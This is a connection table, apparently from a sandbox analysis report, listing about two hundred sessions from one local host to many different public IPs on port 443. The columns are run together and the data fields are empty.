                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20518192.168.2.145739888.185.8.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20519192.168.2.145790679.228.190.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20520192.168.2.143928646.172.254.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20521192.168.2.1439610216.164.101.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20522192.168.2.145791245.7.157.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20523192.168.2.1456140158.106.236.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20524192.168.2.145289669.174.149.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20525192.168.2.1440624156.248.104.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20526192.168.2.1444144154.184.214.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20527192.168.2.1460062116.103.224.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20528192.168.2.1448812186.176.65.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20529192.168.2.143792618.248.31.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20530192.168.2.145305666.150.9.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20531192.168.2.1438690162.184.21.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20532192.168.2.1438688208.112.13.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20533192.168.2.1454456149.63.135.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20534192.168.2.1455938137.48.48.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20535192.168.2.1440252202.178.135.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20536192.168.2.1433010206.39.221.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20537192.168.2.1452738105.225.12.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20538192.168.2.1445492186.61.178.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20539192.168.2.1460726125.25.229.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20540192.168.2.1450290182.47.144.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20541192.168.2.143428886.197.202.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20542192.168.2.1446296221.137.83.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20543192.168.2.14441829.173.55.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20544192.168.2.146055069.133.199.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20545192.168.2.1434984203.187.105.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20546192.168.2.1459648106.76.218.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20547192.168.2.145649851.6.156.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20548192.168.2.143775412.213.75.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20549192.168.2.144791020.103.222.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20550192.168.2.144072643.184.13.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20551192.168.2.1458334144.254.235.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20552192.168.2.1433496145.68.47.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20553192.168.2.1451730168.144.221.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20554192.168.2.1434022171.255.196.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20555192.168.2.1436076168.157.28.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20556192.168.2.143863012.151.188.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20557192.168.2.1438598118.76.117.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20558192.168.2.1441444115.174.57.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20559192.168.2.1452728115.238.154.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20560192.168.2.1444354180.79.146.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20561192.168.2.145981623.53.59.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20562192.168.2.144675082.55.0.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20563192.168.2.144226440.236.155.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20564192.168.2.143804668.81.26.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20565192.168.2.145366639.244.142.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20566192.168.2.1455232117.119.181.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20567192.168.2.145363635.8.245.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20568192.168.2.1458560211.181.178.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20569192.168.2.1453672204.96.201.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20570192.168.2.143738490.149.21.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20571192.168.2.144840054.99.106.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20572192.168.2.145940835.9.106.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20573192.168.2.1433208190.68.59.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20574192.168.2.1456284194.135.231.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20575192.168.2.145301048.92.140.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20576192.168.2.143832076.21.213.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20577192.168.2.143595698.172.149.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20578192.168.2.1449440116.183.170.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20579192.168.2.1435220131.135.60.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20580192.168.2.145749831.85.4.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20581192.168.2.145609625.150.128.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20582192.168.2.1432880112.147.181.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20583192.168.2.1435152116.229.195.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20584192.168.2.1457036134.113.221.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20585192.168.2.1449948163.186.238.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20586192.168.2.144580475.47.193.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20587192.168.2.1443628188.51.208.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20588192.168.2.145192624.33.87.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20589192.168.2.14537882.171.45.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20590192.168.2.1458088185.174.198.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20591192.168.2.144717239.4.95.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20592192.168.2.143423281.214.213.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20593192.168.2.1435758137.91.176.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20594192.168.2.1440374213.179.103.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20595192.168.2.144208435.10.203.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20596192.168.2.1434120134.239.100.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20597192.168.2.1458864171.243.205.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20598192.168.2.1458738167.225.114.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20599192.168.2.1453894115.192.164.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20600192.168.2.1453832144.187.120.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20601192.168.2.145751019.50.84.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20602192.168.2.143679092.188.54.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20603192.168.2.143384850.122.70.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20604192.168.2.1438660187.242.33.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20605192.168.2.1453282180.144.152.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20606192.168.2.1447184180.159.236.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20607192.168.2.1445808193.201.51.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20608192.168.2.1459106155.216.143.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20609192.168.2.145326676.29.98.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20610192.168.2.1438902201.2.53.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20611192.168.2.1448980208.247.199.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20612192.168.2.1452660170.84.245.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20613192.168.2.145697444.167.230.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20614192.168.2.145411051.249.110.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20615192.168.2.1438038173.132.179.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20616192.168.2.146046494.213.216.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20617192.168.2.1449270210.115.48.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20618192.168.2.143480847.236.91.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20619192.168.2.144466235.199.240.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20620192.168.2.145302862.97.225.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20621192.168.2.1434816216.21.218.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20622192.168.2.1438432133.247.205.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20623192.168.2.1433462122.72.44.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20624192.168.2.1442238183.239.188.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20625192.168.2.146030682.90.84.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20626192.168.2.1448890104.22.103.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20627192.168.2.1460248168.93.99.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20628192.168.2.144740691.251.218.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20629192.168.2.1448600147.158.28.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20630192.168.2.1438238195.160.43.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20631192.168.2.1448836169.117.84.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20632192.168.2.1439348190.178.64.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20633192.168.2.1441438137.89.155.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20634192.168.2.1439524143.140.53.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20635192.168.2.1445098212.126.247.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20636192.168.2.144389888.227.174.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20637192.168.2.1440980151.221.2.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20638192.168.2.1455600152.15.193.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20639192.168.2.144714491.145.225.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20640192.168.2.1458458195.186.164.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20641192.168.2.144386242.174.91.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20642192.168.2.1437200114.162.36.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20643192.168.2.1444502146.30.113.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20644192.168.2.144374424.104.73.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20645192.168.2.145278496.108.96.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20646192.168.2.1458998220.8.210.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20647192.168.2.1447150141.78.197.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20648192.168.2.1458498202.234.212.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20649192.168.2.1446722122.131.125.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20650192.168.2.1452456179.29.15.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20651192.168.2.1445226178.17.97.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20652192.168.2.1452378194.168.117.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20653192.168.2.1440286103.244.32.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20654192.168.2.1438618193.147.162.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20655192.168.2.1451582170.0.248.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20656192.168.2.1443488149.226.81.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20657192.168.2.1454574149.166.224.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20658192.168.2.1441576186.139.67.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20659192.168.2.145748287.155.117.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20660192.168.2.1442248159.61.197.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20661192.168.2.1437598169.161.114.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20662192.168.2.1457976184.173.121.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20663192.168.2.1454026206.119.175.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20664192.168.2.145032819.187.108.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20665192.168.2.1439284107.16.253.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20666192.168.2.1457564109.171.20.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20667192.168.2.145004061.250.205.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20668192.168.2.1443818139.57.131.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20669192.168.2.145232051.66.145.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20670192.168.2.143911458.224.241.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20671192.168.2.1453278208.127.19.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20672192.168.2.1446612107.163.67.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20673192.168.2.144332032.132.22.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20674192.168.2.143667653.60.3.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20675192.168.2.143510459.119.76.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20676192.168.2.1460766107.187.0.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20677192.168.2.1454748116.78.15.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20678192.168.2.1440580126.8.98.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20679192.168.2.1448620155.145.237.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20680192.168.2.1438712185.30.118.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20681192.168.2.145332044.59.55.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20682192.168.2.143683881.160.177.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20683192.168.2.145908818.239.82.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20684192.168.2.1451250218.70.165.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20685192.168.2.145363214.89.159.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20686192.168.2.1433678137.64.197.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20687192.168.2.144395039.59.140.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20688192.168.2.143803060.145.84.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20689192.168.2.1439832177.6.63.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20690192.168.2.145979284.13.9.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20691192.168.2.1457086126.115.251.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20692192.168.2.1438432189.221.118.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20693192.168.2.1443646194.31.84.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20694192.168.2.1450634126.105.210.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20695192.168.2.143846499.137.240.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20696192.168.2.143330439.211.48.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20697192.168.2.144516669.187.147.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20698192.168.2.1452302168.82.3.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20699192.168.2.1433520156.246.139.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20700192.168.2.145319640.194.96.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20701192.168.2.1439710119.151.155.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20702192.168.2.1432936139.230.89.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20703192.168.2.1457410163.46.138.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20704192.168.2.14379245.57.174.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20705192.168.2.1438564217.78.140.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20706192.168.2.1453514155.164.103.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20707192.168.2.1437990156.239.79.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20708192.168.2.1445310183.48.216.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20709192.168.2.143873227.242.148.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20710192.168.2.144640423.205.34.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20711192.168.2.1450940129.52.88.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20712192.168.2.143285085.89.12.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20713192.168.2.1460624200.221.7.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20714192.168.2.1433922149.127.172.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20715192.168.2.145215286.128.238.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20716192.168.2.145926418.171.162.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20717192.168.2.143722431.40.223.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20718192.168.2.1449822169.23.189.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20719192.168.2.1435786191.208.166.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20720192.168.2.143530882.114.185.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20721192.168.2.1448690202.152.108.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20722192.168.2.144261469.86.212.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20723192.168.2.145283298.124.251.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20724192.168.2.1435530104.44.171.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20725192.168.2.1445264173.254.165.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20726192.168.2.144093876.129.101.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20727192.168.2.1453598147.153.242.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20728192.168.2.1448070213.92.120.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20729192.168.2.1454646124.169.195.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20730192.168.2.1443656102.231.176.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20731192.168.2.144024838.150.44.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20732192.168.2.1432816132.108.119.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20733192.168.2.1435690181.8.63.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20734192.168.2.1437772217.26.107.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20735192.168.2.144309640.124.4.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20736192.168.2.145847063.28.142.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20737192.168.2.1439956137.79.30.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20738192.168.2.145240474.163.55.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
